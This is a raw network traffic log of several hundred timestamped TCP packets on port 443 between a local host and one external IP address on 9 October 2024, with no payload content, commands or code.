Oct 9, 2024 16:16:04.141711950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141724110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141731977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141751051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141769886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141819954 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141866922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141866922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141879082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141906023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141911030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141923904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.141927958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.141949892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142106056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142153978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142160892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142173052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142201900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142213106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142220020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142241955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142260075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142631054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142674923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142693043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142699957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142713070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142735004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142745018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142751932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142759085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142776012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142796040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.142805099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.142813921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143131018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143171072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143179893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143194914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143214941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143218994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143253088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143261909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143271923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143306017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143326044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143326044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143337965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143352032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143352985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143377066 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143383026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143414974 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143481970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143512011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143532038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143541098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143562078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143662930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143688917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143712044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.143719912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.143738985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.173496962 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.190732002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.190787077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.190838099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.190848112 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.190869093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.190893888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.190973043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.190978050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.190990925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.191025019 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.206537008 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.207009077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229099035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229166985 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229227066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229279995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229301929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229302883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229302883 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229321957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229336023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229340076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229379892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229387045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229398966 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229424953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229432106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229444981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229450941 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229496002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229501963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229535103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229547024 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229557037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229589939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229590893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229604006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229633093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229645014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229720116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229754925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229764938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229770899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229826927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229943991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229986906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.229988098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.229996920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230021954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230035067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230037928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230048895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230074883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230077982 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230086088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230113983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230128050 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230338097 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230381966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230390072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230398893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230444908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230568886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230612993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230617046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230626106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230655909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230667114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230680943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230719090 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230735064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230771065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230778933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.230787992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.230814934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231190920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231228113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231235027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231265068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231271029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231286049 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231296062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231298923 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231343985 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231354952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231368065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231401920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231411934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231455088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231460094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.231466055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.231487989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.232491016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.279268026 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.279344082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.279397011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.279517889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.279519081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.279519081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.279532909 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.279577017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.279701948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.279747009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316479921 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316545010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316550970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316562891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316602945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316606998 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316622019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316644907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316668034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316694021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316747904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316776037 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316828966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316867113 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316909075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.316948891 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.316987991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317101002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317140102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317140102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317150116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317176104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317178011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317195892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317202091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317224979 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317250967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317291975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317297935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317327023 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317332029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317337990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317368031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317442894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317480087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317493916 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317497969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317522049 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317610025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317647934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317652941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317677975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317684889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317691088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317714930 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317787886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317826033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317832947 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317847967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317871094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317878008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317902088 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317933083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.317971945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.317990065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318000078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318032026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318123102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318170071 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318178892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318212986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318222046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318227053 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318281889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318296909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318300962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318315029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318919897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318959951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.318965912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.318996906 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.319016933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.319056988 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.319123030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.319164991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.319166899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.319175959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.319211006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.321182013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.368216991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368268967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.368278980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368320942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.368324995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368335962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368364096 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.368366003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368402004 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.368408918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.368442059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404395103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404453039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404459000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404474020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404500961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404509068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404515982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404542923 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404546022 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404584885 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404591084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404628038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404694080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404736042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404736042 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404748917 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404773951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404778957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404791117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404797077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404822111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404903889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404956102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.404963017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404973030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.404997110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.405003071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.405011892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.405025005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.405050993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.405055046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.405087948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.405733109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.405780077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.405811071 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.405852079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406029940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406061888 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406071901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406078100 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406100035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406119108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406269073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406306028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406311035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406316996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406337976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406343937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406361103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406367064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406388044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406491041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406517029 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406528950 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406537056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406558037 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406598091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406627893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406636953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406641960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406673908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406924963 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406961918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.406968117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.406980038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407002926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.407006025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407023907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407027006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.407066107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.407185078 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407213926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407246113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:04.407254934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:04.407263041 CEST	49723	443	192.168.2.10	84.32.84.109
